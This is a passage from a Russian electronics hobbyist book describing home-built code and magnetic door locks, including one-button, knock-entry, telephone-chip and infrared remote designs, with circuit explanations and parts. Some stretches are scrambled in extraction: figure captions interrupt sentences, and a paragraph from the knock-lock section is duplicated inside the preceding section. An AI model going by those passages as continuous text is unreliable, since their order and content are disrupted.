Замок состоит из четырех герконов SA1, SA2, SA3, SA4 и электромагнита YA1. Причем, герконы SA1, SA2, SA4 имеют нормально разомкнутые контакты, а геркон SA3 — нормально замкнутые. Герконы могут устанавливаться в произвольной последовательности, количество их может быть различным, что способствует повышению секретности замка.
Замок и ключ имеют следующую конструкцию (рис. 6. 3). Герконы SA1— SA4 устанавливаются вдоль отверстия, в которое вставляется ключ с постоянными магнитами. Расстояние между магнитами и герконами должно быть не более 5 мм. Расстояние между герконами должно быть равно расстоянию меж-
Рис. 6. 3. Конструкция замка и ключа
ду центрами магнитов ключа. После того как ключ будет вставлен в отверстие замка до упора, магниты 1, 2, 4 будут находиться напротив герконов SA1, SA2, SA4 соответственно, что приведет к замыканию контактов последних. Поскольку контакты геркона SA3 замкнуты (магнит на него не воздействует), через обмотку электромагнита YA1 начинает протекать ток, вызывая его срабатывание. Если кто-нибудь попытается открыть такой замок, вставив вместо магнитного ключа магнит подходящего размера, то это приведет к срабатыванию всех герконов. При этом контакты геркона SA3 разомкнутся и прервут цепь питания электромагнита YA1. Замок останется в закрытом состоянии.
Герконы могут быть любыми, например КЭМ-1. Однако ток срабатывания электромагнита не должен превышать предельно допустимый ток коммутации герконов. В противном случае вместо электромагнита YA1 необходимо включить реле, контактами которого и будет включаться последний.
Магниты для ключа можно использовать от магнитных шашек или шахмат, подходящие по размерам. Электромагнит YA1 может быть любым, подходящим по таким параметрам, как напряжение питания, ток, тяговое усиление и т. д.
6. 1. 3. Кодовый замок на переключателях
Этот замок имеет 4 внутренних (для установки кода) и 4 внешних переключателя (для набора кода). На рис. 6. 4. показана схема такого кодового замка.
Переключатели SA1 — SA4, предназначенные для установки кода, и электромагнит YA1, сердечник которого механически связан с защелкой замка, находятся с внутренней стороны двери, а переключатели SA5— SA8, используемые для набора кода при входе, — на наружной стороне двери. Если положение хотя бы одного из переключателей SA5 — SA8 будет отличаться от положения соответствующего переключателя из группы SA1 — SA4, цепь питания электромагнита будет разорвана. На рис. 6. 4 положения переключателей соответствуют правильному набору кода.
Переключателями SA1 —SA4 устанавливают условный код замка перед выходом из помещения, и пока переключателями SA5—SA8 не будет набран такой же код, открыть дверь не удастся. С увеличением числа переключателей «секретность» замка повышается.
Рис. 6. 4. Замок на переключателях
6. 1. 10. Дверной кодовый замок с одной кнопкой
Замок управляется одной кнопкой, что является заметным преимуществом, по сравнению с большинством других подобных устройств. Питается он от сети переменного тока напряжением 220 В. В режиме ожидания устройство отключено от сети и не потребляет электроэнергию.
Принципиальная схема дверного кодового замка представлена на рис. 6. 24. В исходном состоянии (кнопка SB1 не нажата) напряжение сети на устройство не подается. При нажатии на кнопку SB1 напряжение сети поступает к устройству. Избыточное напряжение сети гасится конденсатором С1, а необходимое для работы прибора напряжение выпрямляется диодным мостом VD1 и стабилизируется на уровне 9 В стабилизатором, выполненном на элементах R8, VD4, VT1. Конденсаторы С4 и С6 уменьшают пульсации напряжения питания. Резистор R1 ограничивает бросок тока через диодный мост в момент включения устройства. Резистор R2 необходим для разряда конденсатора С1 после отключения устройства от сети. Со стабилизатора напряжение питания+ 9 В подается на микросхемы (DD1 — вывод 16; DD2, DD3, DD4, DD5, DD6 — вывод 14) и другие элементы схемы. В момент включения питания цепь C2R3VD3R6 вырабатывает положительный импульс начальной установки RS-триггера на элементах DD3. 1, DD3. 2 (вывод 13) и сдвигающего регистра DD1 (выводы 6, 14). Этот же импульс на время своей длительности запрещает работу генератора тактовых импульсов на элементах DD2. 1, DD2. 2 (вывод 5). Сигнал нулевого уровня с последнего разряда регистра сдвига DD1 (вывод 2) открывает транзистор VT2, в результате чего срабатывает реле К1, которое, в свою очередь, блокирует кнопку SB1 своими контактами К 1. 1. Контактами К 1. 2 и К 1. 3 кнопка SB1 подключается ко входу D регистра сдвига DD1 (вывод 7) и общему проводу схемы.
После окончания импульса начальной установки генератор на элементах DD2. 1 и DD2. 2 начинает вырабатывать прямоугольные импульсы, следующие с частотой около 2 Гц. Проходя через ключевой элемент DD3. 3, эти импульсы
Рис. 6. 24. Дверной кодовый замок с одной кнопкой управления
разрешают работу генератора колебаний звуковой частоты 1000 Гц, собранного на элементах DD2. 3 и DD2. 4. Пачки импульсов генератора усиливаются по току транзистором VT3 и преобразуются динамической головкой ВА1 в звуковые колебания.
Одновременно прямоугольные импульсы с вывода 3 элемента DD2. 2 поступают на входы С (выводы 9, 1) регистра DD1, осуществляя тем самым сдвиг информации на один разряд по окончании каждой звуковой посылки.
Таким образом, если в момент окончания звуковой посылки кнопка SB1 отпущена, то на информационный вход D (вывод 7) регистра через резистор R5 подается напряжение высокого уровня, значение которого записывается в первый разряд регистра. Соответственно, если кнопка SB1 нажата, в первый разряд регистра DD1 записывается сигнал низкого уровня. В результате, после окончания семи звуковых посылок в первые семь разрядов регистра DD1 будет записан некоторый код, определяемый тем, нажата или отпущена была кнопка в момент окончания соответствующих звуковых посылок. Этот код сравнивается микросхемами DD4, DD5 и DD6 с кодом, который устанавливается перемычками на контактах 1—7 (выводы 9, 13, 1, 6 микросхемы DD4; выводы 6, 9, 13 микросхемы DD5). На эти контакты подается либо напряжение+ 9 В, либо нулевое напряжение, в зависимости от выбранного семизначного кода.
При несовпадении значений набранного и установленного кода на всех выходах сравнивающих элементов микросхем DD4 и DD5 устанавливаются значения логической единицы. Это ведет к появлению логического нуля на выходах элементов DD6. 1 и DD6. 2, а также логической единицы на выходе элемента DD3. 4. Этот единичный уровень напряжения разрешает подачу непрерывного звукового сигнала (после переключения RS-триггера на элементах DD3. 1 и DD3. 2 с элемента DD3. 3 на генератор поступает нулевой уровень) и одновременно обнуляет все триггеры регистра сдвига DD1. Если после набора кода кнопка SB1 будет отпущена, сигнал высокого уровня со входа D регистра DD1 спустя 8 тактов появится на последнем (вывод 2) выходе регистра DD1, транзистор VT2 закроется, реле К1 обеспечится и устройство отключится от сети.
Таким образом, при правильном наборе кода сигнал звонка звучит так:
семь коротких звуковых посылок длительностью по 0, 25 с и одна длинная — около 4 с. При этом единичный уровень с вывода 3 элемента DD3. 4 на время 4 с поступает на базу транзистора VT4, что ведет к открыванию последнего и срабатыванию реле К2, которое своими контактами включает исполнительный механизм замка.
При неправильном наборе кода первый же сигнал высокого уровня на выходе регистра закроет транзистор VT2 и звонок отключится от сети после восьми и более коротких звуковых сигналов.
Резистор R1 типа МЛТ-0, 5, остальные — МЛТ-0,125. Конденсатор С1 должен быть рассчитан на напряжение не менее 400 В — типа К73-11, К73-17, МБМ или другой. Транзистор VT1 можно заменить на КТ817, КТ805, КТ829. Транзисторы VT2—VT4 — любые маломощные. Реле К1, К2 типа РЭС 22 (паспорт РФ4. 500. 129).
При использовании вместо динамической головки ВА1 пьезокерамического излучателя схема несколько упрощается. Пьезокерамический излучатель, например типа ЗП-1, подключается между выводом 10 элемента DD2. 4 и общим проводом или между выводом 10 и выводами 8, 9 элемента DD2. 4. При этом из схемы исключаются элементы R 10, R 11, VT3, ВА1.
Проверку и настройку устройства следует проводить, запитав его (вместо сети) от источника постоянного тока напряжением 12—14 В, предварительно закоротив конденсатор С1 проволочной перемычкой. При правильном монтаже и исправных деталях устройство начинает работать сразу. Подборкой сопротивления резистора R4 или емкости конденсатора СЗ устанавливается период появления тональных посылок. Подборкой сопротивления резистора R7 и емкости конденсатора С5 устанавливается частота звукового сигнала.
После окончания проверки и настройки перемычку с конденсатора С1 необходимо удалить. Устройство можно подключать к сети переменного тока.
Устройство выполнено на печатной плате размером 90х100 мм (рис. 6. 25) из двухстороннего фольгированного стеклотекстолита. Размещение деталей на плате показано на рис. 6. 26.
Рис.. 6. 25. Печатная плата замка с одной кнопкой
Рис. 6. 26. Размещение деталей на плате замка с одной кнопкой
6. 1. 11. Кодовый замок с одной кнопкой и четырехзначным кодом
Это простое и надежное устройство с минимальным количеством микросхем и кнопок. Схема замка позволяет устанавливать четырехзначный код и управлять им с помощью одной кнопки.
Принципиальная схема замка представлена на рис. 6. 27. Управление набором кода производится кнопкой SB1. На элементах DD1. 1 и DD1. 2 собран Rs-триггер, который служит для подавления дребезга контактов, возникающих в механических переключателях. В исходном состоянии кнопка находится в верхнем по схеме положении. При этом на выводе 3 элемента DD1. 1 устанавливается единичный уровень.
При включении питания (контактами кнопки SB2), которое происходит при закрывании двери, через диод VD2 и резистор R6 заряжается конденсатор С2. Это приводит к появлению короткого положительного импульса на входах R микросхем DD2, DD3, устанавливая последние в нулевое состояние. Микросхемы DD2, DD3 готовы к приему установленного кода.
После заряда конденсатора СЗ уровень лог. «1» с вывода 3 элемента DD1. 1 через резистор R3 поступает на вход элемента DD1. 3. Нулевой уровень на выходе последнего приводит к включению светодиода HL1, извещающего о том, что система находится в рабочем состоянии и устройство готово к приему первой цифры кода.
В момент нажатия на кнопку SB1 на выводе 3 элемента DD1. 1 устанавливается нулевой уровень, и конденсатор СЗ быстро разряжается через диод VD1. Для набора цифры кнопку SB1 нажимают соответствующее число раз.
После того как первая цифра набрана, кнопку SB1 отпускают и ждут зажигания светодиода HL1. Если первая цифра набрана правильно, то на выходе мультиплексора DD4 устанавливается логическая единица и начинается заряд конденсатора С5 через резистор R8. При отпускании кнопки SB1 на выводе 3 элемента DD1. 1 вновь появляется единичный уровень и конденсатор СЗ медленно заряжается через резистор R3. В момент достижения на конденсаторе СЗ напряжения логической единицы счетчик DD3 переходит в следующее состояние. Светодиод HL1 снова зажигается, т. е. устройство готово к приему второй цифры.
Рис. 6. 27. Замок с одной управляющей кнопкой
Одновременно уровень лог. «0» с выхода DD1. 3 через диод VD6 поступает на вывод 9 элемента DD1. 4. Однако состояние элемента DD1. 4 не изменится, т. к. конденсатор С5 заряжен до уровня логической единицы.
Так происходит до тех пор пока счетчик DD3 не установится в положение «5». При этом единичный уровень на выходе 1 счетчика DD3 через диод VD5 заблокирует элемент DD1. 4 и, одновременно, поступит на базу транзистора VT1. Транзистор VT1 откроется, реле К1 сработает и своими контактами приведет в действие исполнительный механизм замка. Схема будет находиться в этом состоянии до тех пор пока не будет открыта дверь и не разомкнется кнопка SB2, при этом, после закрытия двери, устройство перейдет в исходное состояние.
Если при наборе кода одна из цифр была набрана неправильно, то на выходе мультиплексора DD4 (вывод 3) единичный уровень не установится, и после отпускания кнопки SB1 и заряда конденсатора СЗ на входах элемента DD1. 4 будут нулевые уровни, а на его выходе — единичный. Положительный импульс через конденсатор С4 и диод VD3 поступит на входы R счетчиков DD2, DD3 и установит их в нулевое состояние.
Так как для расшифровки кода используется десятичный счетчик с дешифратором (DD2), который последовательно складывает цифры кода, то на уста-
Рис. 6. 28. Печатная плата однокнопочного замка
Принципиальная схема устройства представлена на рис. 6. 30. Работает устройство следующим образом. Возле двери или на ней устанавливается один светодиодный семисегментный индикатор HL1, цифры на котором постоянно меняются от нуля до девяти. Для набора кода нужно, наблюдая за индикатором,
Рис. 6. 30. Кодовый замок без кнопок управления
Рис. 6. 29. Размещение деталей на плате замка
новку кода накладываются некоторые ограничения. При наборе кода при помощи кнопки SB1 счетчик DD2 может несколько раз досчитать до своего предельного значения и перейти в нулевое состояние. Задача состоит в том, чтобы при наборе очередного кодового числа счетчик DD2 не останавливался на нулевом значении (вывод 3 DD2).
На схеме установлен код «1682». При последовательном сложении импульсов мы получим: «I», 1+ 6 = "7", 7 + 8 = 15 («5»), 5 + 2 = "7". Перемычки устанавливаются на те выходы DD2, которые соответствуют последней цифре суммы предыдущего положения счетчика со следующей цифрой кода. При этом необходимо помнить, чтобы последняя цифра суммы не была равна нулю.
Для надежного набора кода рекомендуется набирать первую цифру умышленно неверно. Это приводит устройство в исходное состояние и оно готово к приему основного кода.
Питание замка осуществляется от любого стабилизированного источника питания напряжением 9—12 В.
Печатная плата размером 48х80 мм выполнена из двухстороннего фольгированного стеклотекстолита. Вид платы с двух сторон приведен на рис. 6. 28. Размещение деталей на этой плате изображено на рис. 6. 29.
Конденсатор СЗ должен иметь минимальный ток утечки. Реле К1 — РЭС 47, паспорт РФ 4. 500. 421.
Устройство, собранное из исправных деталей, в настройке не нуждается.
6.1.12. Кодовый замок без кнопок управления
Характерной особенностью этого замка является отсутствие кнопок управления на наружной стороне двери. Четырехзначный код вводится несильными ударами по дверному замку в момент появления на индикаторе соответствующей цифры. Код состоит из четырех цифр, от нуля до девяти, причем цифры набираются только в определенной последовательности.
Принципиальная схема устройства представлена на рис. 6. 30. Работает устройство следующим образом. Возле двери или на ней устанавливается один светодиодный семисегментный индикатор HL1, цифры на котором постоянно меняются от нуля до девяти. Для набора кода нужно, наблюдая за индикатором,
Рис. 6. 30. Кодовый замок без кнопок управления
несильно ударять по двери или замку в те моменты, когда на индикаторе устанавливается соответствующая цифра кодовой последовательности. Например, для набора кода «1539» нужно негромко стукнуть в дверь тогда, когда на индикаторе высвечивается «I», затем когда «5», «З» и, наконец, «9». Причем набор цифр можно производить и за несколько циклов, а не обязательно во время одного прохода. Важно чтобы удар был сделан вовремя. Если код набран правильно, то сработает исполнительное устройство и можно входить. Если хотя бы один из ударов был произведен не вовремя, включается звуковая сигнализация, которая звучит около минуты, затем схема переходит в исходное состояние и можно повторить набор кода.
После включения питания датчик включается с задержкой в полминуты, необходимой для выхода и закрывания двери, затем схема переходит в ждущий режим.
В основе работы схемы лежит использование сенсорного датчика В1 — головки от старого пьезокерамического звукоснимателя. Ее иглу прижимают к замку или двери. При ударах, акустические и механические колебания преобразуются датчиком В1 в электрические и поступают на вход операционного усилителя DA1. Коэффициент усиления последнего регулируется резистором R14. Усиленные колебания поступают на базу транзистора VT1 через дифференцируемую цепь C9R15. Каскад на транзисторе VT1 преобразует входные колебания в короткие отрицательные импульсы. Эти импульсы через элемент DD6. 1 поступают на формирователь на элементах DD6. 2 и DD6. 3. Блокировка входа формирователя во время сигнализации и при выдержке после включения выполняется закрыванием элемента DD6. 1 единичным уровнем, поступающим на вывод 12.
Тактовый генератор собран на элементах DD1. 1, DD1. 2. Он вырабатывает прямоугольные импульсы с частотой следования около 4 Гц. Эти импульсы поступают на два счетчика: кодовый на микросхеме DD2 и контрольный — на микросхеме DD7, на выходе которого включен индикатор HL1. Индикатор HL1 и счетчик DD7 монтируются на отдельной плате (рис. 6. 31) и соединяются с основной платой четырехпроводным кабелем.
При счете от нуля до девяти единичный уровень появляется на соответствующем выходе счетчика-дешифратора DD2. Одновременно на индикаторе HL1 зажигаются цифры от нуля до девяти. Сигналы с выходов счетчика DD2 поступают на электронные ключи, входящие в состав микросхемы DD3, и, через диоды VD1 —VD6, на вывод 6 элемента DD5. 2.
Рис.. 6. 31. Печатная плата индикатора и размещение деталей на ней
Допустим, что при нашем коде 1539, удар по двери произведен в момент появления на индикаторе HL1 единицы. Тогда уровень единицы будет и на выходе 1 (вывод 2) счетчика DD2 и на входе А электронного ключа DD3. 1. В момент удара элементы DD6. 1, DD6. 2, DD6. 3 формируют положительный импульс, включающий ключи микросхемы DD3. Сигналы с выходов счетчика DD2 проходят на входы R триггеров DD4. 1—DD4. 4. Но, так как триггеры переключаются только единичным уровнем, то в данном случае переключится только триггер DD4. 1 и на его выходе и входе S триггера DD4. 2 будет зафиксирован уровень нуля, который дает возможность триггеру DD4. 2 переключиться при правильном наборе второй цифры кода. Так как триггеры DD4. 1 — DD4. 4 могут переключаться в строго определенной последовательности, то и цифры кода должны быть набраны по порядку.
Рис. 6. 32. Печатная плата дешифратора замка
Выходы счетчика DD2, не входящие в кодовое слово, через диоды VD1 —VD6 соединяются со входом ключевого элемента DD5. 2. Поэтому, если удар произведен в момент появления некодовой цифры, единичный уровень поступает на вывод 6 и вывод 5 элемента DD5. 2. Появление на выходе элемента DD5. 2 (вывод 4) нулевого уровня приводит к запуску одновибратора на элементах DD5. 3, DD5. 4. Этот одновибратор формирует отрицательный импульс длительностью около одной минуты, который через элемент DD5. 1 устанавливает триггеры DD4. 1 —DD4. 4 в исходное состояние, а также обнуляет счетчики DD2 и DD7 и блокирует их на время действия импульса. На это время импульсы с генератора проходят через элемент DD1. 3 и могут служить для запуска звукового генератора системы сигнализации (на схеме не показан). В то же время через диод VD8 блокируется вход схемы для предотвращения зацикливания устройства. Если код набран правильно, то нулевой уровень устанавливается на выходе триггера DD4. 4 и, соответственно, единичный — на выходе элемента DD6. 4, который через диод VD9 блокирует вход устройства. Одновременно срабатывает реле К1, т. к. открывается транзистор VT2, и своими контактами включает исполнительное устройство. Дверь можно открывать. При открывании двери размыкаются контакты кнопки SB1, цепь питания устройства размыкается, реле обесточивается. При последующем закрывании двери устройство снова включается в дежурный режим через 30 с. Это время устанавливается времязадающей цепью R3C3.
Настройка заключается в установке желаемой чувствительности устройства подбором резистора R 14, а также путем подбора номиналов элементов R 10 и С5 так, чтобы схема не зацикливалась. Желаемую скорость счета можно установить подбором сопротивления резистора R1.
Вместо пьезокерамической головки В1 типа ГЗП можно использовать пьезокерамический излучатель типа ЗП-1 и т. п.
Рис. 6. 33. Размещение деталей на плате дешифратора замка
Устройство выполнено на печатной плате размером 58х88 мм из двухстороннего фольгированного стеклотекстолита. Чертеж платы представлен на рис. 6. 32. Размещение деталей на плате показано на рис. 6. 33.
6. 1. 13. Кодовый замок на телефонной микросхеме
Это кодовое устройство состоит из пульта управления с десятью кнопками и исполнительного устройства. Код состоит из четырех цифр, от 1 до 9, которые набираются в определенной последовательности. Имеется защита от последовательного подбора кода. Если следующая цифра набрана неправильного, все предыдущие, набранные правильно, стираются и код нужно набирать сначала.
В основе работы системы лежит принцип число импульсного кодирования, при котором каждой цифре кода присваивается определенное число импульсов, т. е. числу, например, шесть соответствует шесть импульсов.
Принципиальная схема электронной части замка приведена на рис. 6. 34. В ее основе лежит специализированная телефонная микросхема — электронный номеронабиратель с импульсным набором номера. Это широко распространенная микросхема КР1008ВЖ1. Микросхема позволяет формировать последовательности, состоящие из 1—10 импульсов, в зависимости от состояния клавиатуры, т. е. от нажатой в данный момент кнопки. Кроме того, микросхема имеет память, поэтому нажимать кнопки можно не дожидаясь окончания предыдущей импульсной посылки.
В данном устройстве используются только комбинации от 1 до 9 импульсов в посылке. Кодовые посылки формируются при нажатии кнопок SB1—SB9. Кодовая посылка, состоящая из 10 импульсов, в данном устройстве не формируется. Кнопка SB0 служит для приведения устройства в исходное состояние перед набором кода. Каждый раз перед набором четырехзначного кода рекомендуется нажать кнопку SB0.
Необходимый код устанавливается проволочными перемычками на печатной плате замка. В данном случае (рис. 6. 34) установлен код «2375».
Начнем набор кода с приведения схемы в исходное состояние. Для этого необходимо нажать на кнопку SB0. При этом на вход D (вывод 15) микросхемы DD1 поступит напряжение питания, т. е. уровень логической единицы, который переведет микросхему в исходное состояние. Одновременно уровень логической единицы поступает через диод VD8 на вход S (вывод 6) триггера DD5. 1, что приводит к появлению логической единицы на его выходе, а это, в свою очередь, — к установке триггеров DD5. 2, DD5. 3, DD5. 4 в единичное состояние. Схема готова к приему числового кода.
Произведем набор кода путем последовательного нажатия кнопок SB2, SB3, SB7, SB5. При этом положительные импульсы, число которых соответствует номеру нажатой кнопки, формируются на выходе N (выход 12) микросхемы DD1 и поступают на вход инвертирующего элемента DD2. 1. В исходном состоянии на выходе последнего (вывод 10) присутствует высокий уровень. По фронту первого положительного импульса на выходе 10 элемента DD2. 1 формируется
Рис. 6. 34. Кодовый замок на телефонной микросхеме
отрицательный импульс. Конденсатор СЗ быстро разряжается через диод VD1. На выводе 4 элемента DD2. 3 появляется уровень логического нуля. Это приводит к закрыванию ключевых элементов DD4. 1 —DD4. 4. Одновременно конденсатор С2 разряжается через резистор R4, и на входе R счетчика устанавливается нулевой уровень, счетчик DD3 готов к подсчету поступающих на его вход CN (выход 14) импульсов. Как только набор очередной цифры прекратится, в импульсном сигнале, поступающем с вывода 12 микросхемы DD1, возникнет пауза, достаточная для зарядки конденсатора СЗ через резистор R3. В момент заряда конденсатора СЗ до уровня логической единицы на выходе элемента DD2. 3 уста-
Рис. 6. 35. Печатная плата замка на телефонной микросхеме
навливается единичный уровень, который переводит ключевые элементы микросхемы DD4 в открытое состояние. Если код набран правильно, через элемент DD4. 1 с выхода 2 счетчика DD3 (вывод 4) на вход R триггера DD5. 1 поступит уровень логической единицы, который переводит триггер DD5. 1 в нулевое логическое состояние. Уровень логического нуля на выходе триггера DD5 служит сигналом разрешения на прием второй цифры кода триггером DD5. 2.
Единичный уровень напряжения с вывода 4 элемента DD2. 3 через резистор R4 заряжает конденсатор С2. В момент достижения на конденсаторе С2 напряжения логической единицы счетчик DD3 обнуляется и счетчик готов к приему очередной последовательности импульсов.
После набора четырех цифр кода на выходе инвертирующего элемента DD2. 4 устанавливается единичный уровень, транзистор VT1 открывается, срабатывает реле К1 и своими контактами включает исполнительный механизм..
Если при наборе кода в одной из цифр была допущена ошибка, то на одном из выходов счетчика DD3, не подключенном к ключевым элементам DD4. 1 — DD4. 4, устанавливается единичный уровень. Этот сигнал через один из диодов VD2—VD6 поступает на базу транзистора VT2. После окончания серии импульсов на выходе элемента DD2. 3 устанавливается уровень логической единицы и транзистора VT2 открывается, a VT3 закрывается. При этом на вход S триггера DD5. 1 поступит уровень логической единицы, который установит триггер DD5. 1 и соответственно триггеры DD5. 2—DD5. 4 в исходное состояние. В этом случае потребуется повторный набор всего кода.
При открывании двери устройство выключается, т. к. размыкаются контакты кнопки SB 10, обесточивается обмотка реле К1 и исполнительный механизм возвращается в исходное состояние.
Рис. 6. 36. Размещение деталей на плате замка
Настройка устройства сводится к подбору сопротивления резистора R3 таким образом, чтобы при поступлении импульсов на выводе 4 элемента DD2. 3 присутствовал логический нуль, а в паузе между наборными посылками двух цифр — единица. Сопротивление резистора R4 подбирается так, чтобы в паузе между посылками счетчик DD3 успевал установиться в нулевое логическое состояние.
Электронная часть кодового замка смонтирована на печатной плате размером 65х70 мм, изготовленной их двухстороннего фольгированного стеклотекстолита. Чертеж платы представлен на рис. 6. 35, а размещение деталей на плате — на рис. 6. 36.
6.1.14. Дистанционно управляемый замок на микросхемах
В отличие от вышеописанных, это устройство выполнено на широко распространенных микросхемах серии К561. Оно позволяет получить более 3000 четырехзначных кодовых комбинаций. Для дистанционного управления может быть использован радиочастотный или ИК каналы. Управление производится путем нажатия всего одной кнопки, расположенной на выносном пульте управления. Устройство может быть использовано не только для открывания дверей, но также и для снятия с охраны систем сигнализации квартиры, офиса или автомобиля.
Принципиальная схема устройства приведена на рис. 6. 37. Оно состоит из следующих функциональных узлов: мультивибратора на элементах DD1. 1, DD1. 2, десятичного счетчика с дешифратором DD2, мультиплексора DD4, системы управления на двоичном счетчике DD3 и элементах DD1. 3, DD1. 4, выходного каскада на транзисторе VT1.
При первоначальном подключении источника питания счетчики DD2 и DD3 могут установиться в произвольное положение. При этом устройство выдаст произвольную кодовую комбинацию до появления высокого уровня на выводе 5 счетчика DD3. В дальнейшем устройство будет выдавать кодовую комбинацию только после нажатия кнопки SB1. Итак, в исходном состоянии на выводе 5 счетчика DD3 будет уровень логической единицы, который через диод VD2 поступает на вход R счетчика DD2, сбрасывая его в нулевое состояние, и вывод 2 элемента DD1. 1, входящего в состав генератора прямоугольных импульсов, запрещая работу последнего.
При нажатии на кнопку SB1 зарядный ток конденсатора СЗ создает положительный импульс на входе установки нуля R счетчика DD3. В результате на всех выходах DD3 устанавливаются нулевые уровни. Это приводит к появлению на выводе 2 элемента DD1. 1 и выводе 15 счетчика DD2 также нулевых уровней. Генератор на элементах DD1. 1 и DD1. 2 начинает вырабатывать прямоугольные импульсы с частотой около 125 Гц. С выхода генератора импульсы поступают на транзистор VT1 выходного каскада и на счетный вход CN счетчика DD2. При этом транзистора VT1 открывается и конденсатор С4 быстро разряжается через светодиод HL1, что приводит к появлению мощного коротко-
Рис. 6. 37. Ключевое кодирующее устройство
го импульса в инфракрасном диапазоне частот. В промежутках между импульсами конденсатор С4 подзаряжается от источника питания через резистор R7. Счетчик DD2 подсчитывает приходящие импульсы, и на одном из выходов, соответствующем количеству счетных импульсов, появляется уровень логической единицы. Поскольку на адресных входах мультиплексора DD4 (выводы 9 и 10) присутствует напряжение низкого уровня, то выход последнего (вывод 3) соединен с входом 1 (вывод 1), подключенным к выходу 2 счетчика DD2 (вывод 4).
Как только число поступающих от генератора импульсов достигнет установленного перемычкой значения первой кодовой цифры (в данном случае 2), логическая единица со второго выхода счетчика DD2 через мультиплексор DD4 поступит на вывод 9 элемента DD1. 3. На элементах DD1. 3, DD1. 4 собран одновибратор, формирующий паузу между пачками импульсов. Появление единицы на выводе 9 элемента DD1. 3 запускает одновибратор, и на его выходе (вывод 11 DD1. 4) формируется положительный импульс с длительностью, определяемой параметрами времязадающей цепи C2R2. Длительность этого импульса равна длительности паузы между пачками импульсов. Положительный импульс поступает на вход CN счетчика DD3 непосредственно, а через диод VD1 — на вывод 2 элемента DD1. 1, запрещая работу генератора импульсов, и на вход R счетчик DD2, устанавливая его нулевое состояние. После окончания этого импульса начинается процесс формирования второй цифры кодовой комбинации. Импульсом одновибратора показания счетчика DD3 увеличиваются на единицу и на его выходе 1 (вывод 3) появляется уровень логической единицы, в результате чего код на входе управления мультиплексора DD4 (01) изменяется и к его выходу подключается вход 2 (вывод 5 DD4) выход 4 (вывод 10) счетчика DD2. Импульсы с генератора вновь поступают на транзистор VT1 и счетчик DD2. После прихода четырех импульсов, на выходе 4 счетчика DD2 (вывод 10) появляется высокий логический уровень, которым через перемычку и мультиплексор и вновь запускается одновибратор. Далее процесс формирования кодового слова повторяется. Это происходит до тех пор, пока не будет сформирована последняя пачка импульсов (четвертая пачка). Затем формируется четвертый импульс паузы, который устанавливает счетчик DD3 в состояние, когда на выходе 4 (вывод 5) появляется уровень логической единицы, который через диод VD2 поступает на вход установки нуля R счетчика DD2 и блокирует генератор импульсов на элементах DD1. 1, DD1. 2. Устройство переходит в ждущий режим до следующего нажатия на кнопку SB1. Цепь, состоящая из резистора R3 и конденсатора СЗ, служит для устранения сбоев от дребезга контактов кнопки SB1.
Транзистор VT1 может быть заменен на КТ816, КТ973. Вместо указанного на схеме светодиода HL1 можно использовать два включенных последовательно светодиода типа АЛ107А, Б. Печатная плата изготовлена из пластины двухстороннего фольгированного стеклотекстолита размером 33х48 мм. Внешний вид рисунка платы показан на рис. 6. 38. Размещение деталей на плате показано на рис. 6. 39. Питается устройство от батарейки или аккумуляторов напряжением 3 В.
Рис. 6. 38. Печатная плата кодирующего блока
Приемное и декодирующее устройства выполнены в виде отдельного блока, принципиальная схема которого приведена на рис. 6. 40.
Декодер состоит из следующих узлов: детектора кодовых импульсов и импульсов паузы на элементах DD1. 1—DD1. 4; десятичного счетчика числа импульсов в пачке на микросхеме DD2; мультиплексора DD4, переключающего перемычки, которыми задается кодовое число; устройства управления на двоичном счетчике DD3. 1 и элементе DD5. 1; распознавателя кода на счетчике DD3. 2;
триггера управления на элементах DD5. 2, DD5. 3.
Фотоприемник выполнен по типовой схеме с использованием специализированной микросхемы DA1 типа К1056ПУ1. Его устройство и работа подробно
Рис. 6. 39. Размещение деталей на плате кодирующего блока
описаны в различной литературе и особенностей не имеют. Вообще, фотоприемник может быть любого типа, важно лишь, чтобы при приеме сигнала на его выходе были отрицательные импульсы.
В то время когда кодовый посылки нет, на выходе фотоприемника (коллектор транзистора VT1) высокий логический уровень. Этот сигнал через резистор R5 поступает на выводы 12, 13 элемента DD1. 1. На выводах 10 и 4 этой же микросхемы (DD1) тоже устанавливаются уровни логической единицы. Цепь R5C6 совместно с элементами DD1. 1 и DD1. 2 служит для селекции кодовых импульсов и одновременно выполняет функции интегратора и триггера Шмитта. Выходные импульсы этого селектора, снимаемые с вывода 10 элемента DD1. 2, несколько задержаны относительно входных и имеют крутые фронты, не зависимо от длительности фронтов входных импульсов, поступающих с фотоприемника. Кроме того, такое входное устройство имеет особенность пропускать импульсы только с длительностью не менее определенного значения, определяемого постоянной времени цепи R5C6. В результате импульсы, вызванные атмосферными или другими помехами и имеющие малую длительность, не поступают на вход CN счетчика DD2.
В течение всего времени, пока поступают импульсы кодовой посылки, напряжение на выходе 4 элемента DD1. 4 поддерживается на нулевом уровне. Цепь на VD5, R7 и С8 служит для формирования сигнала окончания кодовой посылки и выполняет функции детектора пауз, но с большей постоянной времени. В течение всего времени кодовой посылки, состоящей из пачек и пауз, напряжение на конденсаторе С8 поддерживается на уровне нуля. Как только посылка заканчивается, конденсатор С8 заряжается через резистор R7 и до уровня логической единицы.
Пачки импульсов кодовой посылки поступают на вход CN счетчика DD2. По окончании каждой пачки на том выходе DD2, номер которого соответствует числу импульсов в пачке, устанавливается уровень логической единицы. Импульс паузы, сформированный элементами DD1. 3, DD1. 4, поступает на входы инвертирующего элемента DD5. 1 и через резистор R8 начинает заряжать конденсатор С5. Проинвертированный импульс паузы с выхода элемента DD5. 1 поступает на стробирующий вход мультиплексора DD4 (вывод 6). При этом к
Рис. 6. 40. Принципиальная схема декодирующего устройства
выходу мультиплексора подключается вход, код которого задан счетчиком DD3. 1 (в данном случае код 00 и вход 1 (вывод 1 DD4)). Если число импульсов в пачке соответствует первой кодовой цифре, то на выход мультиплексора и на вход СР счетчика DD3. 2 поступает уровень логической единицы (через проволочную перемычку) с выхода 2 счетчика DD2.
Все эти процессы происходят в то время, пока конденсатор С5 заряжается через резистор R8. Как только напряжение на нем достигнет уровня логической единицы, счетчик DD2 установится в нулевое состояние, а счетчик DD3. 1 переключится в следующее состояние, на его выходах появится код 01 и мультиплексор DD4 подключится ко второй перемычке (вывод 5). Отрицательный перепад напряжения через мультиплексор DD4 поступает на вход СР счетчика DD3. 2 и переключает его. В результате, по окончании каждой пачки импульсов, если число импульсов в ней совпадает с числом, заданным перемычкой, на вход СР DD3. 2 будет воздействовать положительный импульс, по спаду которого счетчик DD3. 2 переходит в следующее состояние.
